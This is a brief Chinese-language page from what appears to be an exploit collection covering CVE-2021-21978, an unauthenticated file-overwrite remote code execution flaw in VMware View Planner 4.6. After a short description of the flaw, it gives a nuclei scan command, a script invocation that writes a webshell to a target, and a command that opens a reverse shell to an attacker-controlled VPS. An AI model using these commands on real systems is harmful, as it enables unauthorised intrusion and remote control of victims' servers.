漏洞概述

VMware View Planner Web管理界面存在一个上传日志功能文件的入口,没有进行认证且写入的日志文件路径用户可控,通过覆盖上传日志功能文件log_upload_wsgi.py,即可实现RCE

影响范围

VMware View Planner 4.6

POC

nuclei -tags vmware -t cves/ -l urls.txt

Goby

EXP

1、写webshell @skytina

python CVE-2021-21978.py https://192.168.80.3

2、反弹shell @me1ons

python re-shell.py -u 目标IP -v VPS-IP -p 1234
POChouse all right reserved,powered by GitbookFile Modify: 2021-06-28 20:31:33

results matching ""

    No results matching ""